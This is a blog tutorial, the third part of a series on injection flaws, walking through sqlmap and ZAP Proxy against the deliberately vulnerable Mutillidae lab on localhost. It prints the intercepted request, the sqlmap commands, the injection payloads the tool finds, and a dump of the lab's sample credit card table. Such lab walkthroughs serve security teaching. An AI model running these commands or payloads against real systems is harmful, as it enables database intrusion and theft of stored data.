A1: 2017 – Injections (Part 3)

In my favorite computer game «Quest for Glory 2: Trial by Fire», when the world is once again on a brink of destruction, our hero gets to the Wizard’s Institute of Technocery. After successfully passing the exams wise magicians offer you to enter this University because, having finished it, our hero will understand all subtleties of magic, study all the possible spells and then save all his friends and the whole world. The problem is that the study will take about 15-20 years, and during this time forces of evil will win once and for all.
I recall this episode each time when I have another thick book or pile of whitepapers in front of me. There are tons of books about time management, but for me it all boils down to the simple formula: get used with the basics, study a lot of examples and automate everything else.

Now we have an idea how injections work, why not try to make your life little easier and return to past examples, but with the help of additional software. We’ll need two tools:

  • Sqlmap is a tool that allows you to automate the search and exploitation of vulnerabilities in SQL.
  • ZAP Proxy is a local proxy server that is needed to analyze traffic between the browser and the web server.

It is necessary to mention, that these are not the only tools out there, and in the neighboring blog you’ll certainly find reasons to use sqlninja instead of sqlmap, and burp instead of ZAP. I’m not going to argue with anyone on this.

Let’s start with intercepting traffic between the client and the web server. The collected data will be used as parameter for sqlmap. By and large, the URL of the vulnerable web application can be used as such a parameter, but proxy data will be a little more intuitive for us.
We will work with the same example from A1, which we have taken up in the previous article («SQLi – Extract Data» > «User Info (SQL)»).

sqli

Let’s visit this page through our ZAP Proxy and enter some data. I understand that there is a great temptation to try something that we have learned, but just for now we simply need to enter pretty much anything. I’ll enter my favorite admin/password and intercept this request:

GET http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=password&user-info-php-submit-button=View+Account+Details HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Referer: http://127.0.0.1/mutillidae/index.php?page=user-info.php  
Cookie: showhints=1; PHPSESSID=aqvrdm615sm8k7isopefgbhega  
Connection: keep-alive  
Upgrade-Insecure-Requests: 1  
Host: 127.0.0.1 

Here we are interested in the first line, the request itself. Sometimes it is useful to check if works correctly. You can do this by repeating this generated query in the same browser. If we get the same page with an error, then we are on the right track.
Let’s save our intercepted request as a separate file request_sqlmap.txt. Now let’s pass this file for analysis in sqlmap:

sqlmap -r reqest_sqlmap.txt --banner 

The –banner parameter is needed to determine which DMBS we are dealing with. In our example, this is not that important, but in real life you will be able to speed up testing without being distracted by aspects of other DBMS that are not applicable to your case.

[23:19:48] [INFO] GET parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable  
GET parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n  
sqlmap identified the following injection point(s) with a total of 181 HTTP(s) requests:  
---  
Parameter: username (GET)  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: page=user-info.php&username=admin' AND (SELECT 5399 FROM(SELECT COUNT(*),CONCAT(0x7171707871,(SELECT (ELT(5399=5399,1))),0x71706a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UUZA'='UUZA&password=password&user-info-php-submit-button=View Account Details  
Type: UNION query  
Title: Generic UNION query (NULL) - 7 columns  
Payload: page=user-info.php&username=admin' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171707871,0x4d754c5372467a65665a4c7672636e4c4a554777547162474e666f784e6b69754a43544a41675a50,0x71706a6271),NULL,NULL,NULL-- GGvT&password=password&user-info-php-submit-button=View Account Details  
---  
[23:20:10] [INFO] the back-end DBMS is MySQL  
[23:20:10] [INFO] fetching banner  
web server operating system: Windows  
web application technology: Apache 2.4.29, PHP 7.2.3  
back-end DBMS: MySQL >= 5.0  
banner: '10.1.31-MariaDB'  
[23:20:10] [INFO] fetched data logged to text files under '/home/belowzero273/.sqlmap/output/127.0.0.1' 

Initial scanning  is done and we can see an expected result:

[23:19:48] [INFO] GET parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable 

Sqlmap also detected that we are dealing with mysql, or rather its fork. Ok. Now let’s see what databases are there on the server:

 sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL --dbs 

Here we’ve added some addition keys: -p, –dbms and –dbs to get data about existing databases:

[23:27:19] [WARNING] reflective value(s) found and filtering out  
available databases [6]:  
[*] information_schema  
[*] mutillidae  
[*] mysql  
[*] performance_schema  
[*] phpmyadmin  
[*] test 

securityByObscurity.pngCool. Usually databases have meaningful names, or they are created automatically when applications are installed. The «Security by obscurity» principle is little outdated but still quite popular for some reason. The most interesting thing in our case is Mutillidae base, let’s see what it consists of:

 sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL -D mutillidae --tables 

Here we will specify the necessary DBMS and the –tables key to our command to get tables of this database:

[23:29:42] [WARNING] reflective value(s) found and filtering out  
Database: mutillidae  
[13 tables]  
+----------------------------+  
| accounts 		     |  
| balloon_tips               |  
| blogs_table                |  
| captured_data              |  
| credit_cards               |  
| help_texts                 |  
| hitlog                     |  
| level_1_help_include_files |  
| page_help                  |  
| page_hints                 |  
| pen_test_tools             |  
| user_poll_results          |  
| youtubevideos              |  
+----------------------------+

That’s good. The credit_cards table looks particularly promising. Let’s look at it:

sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL -D mutillidae -T credita_cards --columns 

and we get:

[23:31:35] [WARNING] reflective value(s) found and filtering out  
Database: mutillidae  
Table: credit_cards  
[4 columns]  
+------------+---------+  
| Column     |   Type  |  
+------------+---------+  
| ccid       | int(11) |  
| ccnumber   | text    |  
| ccv        | text    |  
| expiration | date    |   
+------------+---------+ 

Wow, there’s a whole table where credit card data should be stored! Let’s take a look at this table:

sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL -D mutillidae -T credit_cards --dump 

Oops:

[23:32:42] [WARNING] reflective value(s) found and filtering out  
Database: mutillidae  
Table: credit_cards  
[5 entries]  
+------+-----+----------------------------+-----------------+  
| ccid | ccv | ccnumber                   | expiration      |  
+------+-----+----------------------------+-----------------+  
| 1    | 745 | 4444111122223333           | 2012-03-01      |  
| 2    | 722 | 7746536337776330           | 2015-04-01      |  
| 3    | 461 | 8242325748474749           | 2016-03-01      |  
| 4    | 230 | 7725653200487633           | 2017-06-01      |  
| 5    | 627 | 1234567812345678           | 2018-11-01      |  
+------+-----+----------------------------+-----------------+

Here they are, our credit cards. You should have two big burning questions in your head right now: how does it even possible and where does all this data come from?
How does it possible? Well, strictly speaking, just as if you were browsing through all the possible options, trying randomly exploit vulnerability.
And the second question is a question for the administrator who left such important information in such a wrong place.
Sqlmap has dozens of parameters that we can’t learn in one article. But the goal of my articles is to introduce problems and technique, everything else is up to you.

Try to dig the rest of the databases and experiment with the parameters, perhaps credit cards aren’t the most interesting things here.

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s